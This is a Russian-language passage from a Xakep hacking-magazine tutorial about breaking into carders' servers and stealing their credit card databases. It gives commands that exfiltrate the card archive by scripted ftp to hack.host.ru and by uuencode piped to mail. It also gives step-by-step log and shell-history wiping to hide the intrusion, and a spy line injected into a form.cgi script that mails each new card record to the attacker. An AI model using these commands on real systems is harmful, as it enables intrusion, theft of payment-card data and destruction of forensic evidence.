Найди и поимей!

Докучаев Дмитрий aka Forb

Спецвыпуск Xakep, номер #036, стр. 036-090-5

Таблица: создание ftp-сценария.

Эта последовательность команд составит и выполнит ftp-сценарий

echo user hacker 31337 > ftp

echo pass

echo type binary

echo put ./cc_baze.tar.bz2

echo quit

ftp -n hack.host.ru < ./ftp

Опция -n ftp-сервера позволяет производить аутентификацию в одну строку (без поддержки интерактивности). Именно поэтому я указал имя пользователя и его пароль в одной строке. Заставить клиента перечитать текстовик как сценарий позволяет стандартное перенаправление дескриптора ввода (stdin). При этом лишь остается дождаться, пока файл транспортируется с сервера на удаленный ftp’шник.

При отсутствии ftp-сервера, можно воспользоваться командой mail, чтобы послать базу на мыло. Но перед этим необходимо превратить аттач в uuencode-шифр командой uuencode:

uuencode ./cc_baze.tar.bz2 cc_baze.tar.bz2 | mail hacker@host.ru

Параметры uuencode назначают имена локального файла и название архива после кодирования. Но стоит быть уверенным, что smtpd на удаленном серваке настроен и работает как надо, иначе послать e-mail не получится.

Кончил - протри станок!

Немаловажным шагом после бэкапа базы является тщательная протирка логов. Естественно, делать это нужно только под root-правами, под непривилегированным аккаунтом следует принять все меры, чтобы оставлять как можно меньше следов.

Во-первых, это /var/log/messages - лог, о котором почему-то все забывают. Туда сваливаются мессаги различного характера. После взлома сервера его обязательно нужно почистить.

Во-вторых, файлы в домашней директории пользователя. Это .bash_history и .mysql_history. За историю команд интерпретатора можно не беспокоиться, если предварительно была выполнена команда unset HISTFILE. Чтобы очистить список команд mySQL, необходимо удалить файл, либо выполнить false > /path/to/.mysql_history, чтобы обнулить его содержимое.

В-третьих, директория /var/log/mysql хранит все логи обращений к СУБД. Их также необходимо удалить.

И, наконец, нужно уделить внимание таким мелочам, как лог от httpd, временные сценарии и базы с кредами, которые, возможно, были оставлены в каталогах /home, /tmp и т.п.

Собственная безопасность при этом превыше всего, так как у кардеров очень хорошие связи. Если они заподозрят тебя в краже своих баз и обнаружат твой IP в логах - поверь, придется очень несладко.

Подпишись на рассылку

Ты, наверное, знаешь, что база у крупных кардеров постоянно пополняется. Каждый раз лезть на сервак и архивировать новые карточки не совсем удобно, поэтому можно добавить несколько посторонних строк в perl/php код, обрабатывающий запрос с Web. Но следует быть очень осторожным, ведь кардер сам мог составить этот скрипт и знать код в нем как свои пять пальцев.

Допустим, у нас имеется скрипт form.cgi, в котором находится обращение к базе и запись туда содержимого массива @card. Шпионская строка вида

system("echo @card | mail hacker@host.ru");

позволяет отправлять данные о карте на твое мыло. Перед этим следует запомнить, какие именно данные заносятся в этот массив.